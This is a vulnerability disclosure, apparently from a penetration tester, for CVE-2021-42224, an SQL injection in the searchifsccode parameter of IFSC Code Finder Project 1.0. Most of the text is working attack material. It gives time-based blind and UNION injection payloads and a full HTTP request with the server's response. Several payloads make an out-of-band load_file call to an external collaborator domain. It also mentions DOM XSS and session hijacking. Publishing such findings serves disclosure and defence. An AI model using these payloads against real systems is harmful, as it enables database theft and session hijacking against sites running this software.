Hello, dear friends.

KR

## [CVE-2021-42224](https://phpgurukul.com/ifsc-code-finder-project-using-php/)
## [Vendor](https://phpgurukul.com/author/admin/)
![](https://github.com/nu11secur1ty/CVE-mitre/blob/main/CVE-2021-42224/docs/Screenshot%202021-10-14%20104403.png)

## Description:
- vulnerability: `all or nothing`

SQL Injection vulnerability exists in IFSC Code Finder Project 1.0 via
the searchifsccode POST parameter in /search.php.
The searchifsccode parameter appears to be vulnerable to SQL injection
attacks. The test payload '+(select
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'
was submitted in the searchifsccode parameter. This payload injects a
SQL sub-query that calls MySQL's load_file function with a UNC file
path that references a URL on an external domain. The application
interacted with that domain, indicating that the injected SQL query
was executed. Also the parameter "searchifsccode" from search.php is
XSS-Dom vulnerable plus PHPSESSID hijacking.

## SQL injection Types

```mysql
---
Parameter: searchifsccode (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: searchifsccode=849487'+(select
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'')
AND (SELECT 1445 FROM (SELECT(SLEEP(5)))EBDq) AND
('ubep'='ubep&search=%C2%9E%C3%A9e

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: searchifsccode=849487'+(select
load_file('\\\\bp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net\\ing'))+'')
UNION ALL SELECT
NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x7176766b71,0x624a5562647364654b616a684c6d546a427263576377794168415561525872414e53664d6a6e6444,0x7171786271),NULL--
-&search=%C2%9E%C3%A9e
---
```
## Mysql Request:

```mysql
POST /IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/search.php
HTTP/1.1
Host: 192.168.1.180
Origin: http://192.168.1.180
Cookie: PHPSESSID=jmir9unlgf2inpr758uva4ruhb
Upgrade-Insecure-Requests: 1
Referer: http://192.168.1.180/IFSC%20Code%20Finder%20Project%20Using%20PHP/ifscfinder/
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US,en-GB;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)
AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61
Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Length: 42

searchifsccode=849487'%2b(select%20load_file('%5c%5c%5c%5cbp4frncin7wvtb1vnxr1n6ngh7n0bzzq2eu1kp9.nu11secur1tycollaborator.net%5c%5cing'))%2b'&search=%C2%9E%C3%A9e
```

## MySQL Response:

```mysql
HTTP/1.1 200 OK
Date: Thu, 14 Oct 2021 07:02:37 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/7.4.24
X-Powered-By: PHP/7.4.24
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 7797
Connection: close
Content-Type: text/html; charset=UTF-8

<!doctype html>
<html class="no-js" lang="en">

<head>

<!--====== Title ======-->
<title>IFSC Code Finder Portal | Home</title>

<!--====== Slick CSS ======-->
<link
...[SNIP]...
```
## Proof:
[href](https://streamable.com/kqadhc)

## Reproduce:
[href](https://github.com/nu11secur1ty/CVE-mitre/edit/main/CVE-2021-42224)


-- 
System Administrator - Infrastructure Engineer
Penetration Testing Engineer
Exploit developer at https://packetstormsecurity.com/
https://cve.mitre.org/index.html and https://www.exploit-db.com/
home page: https://www.nu11secur1ty.com/
hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E=
                          nu11secur1ty <http://nu11secur1ty.com/>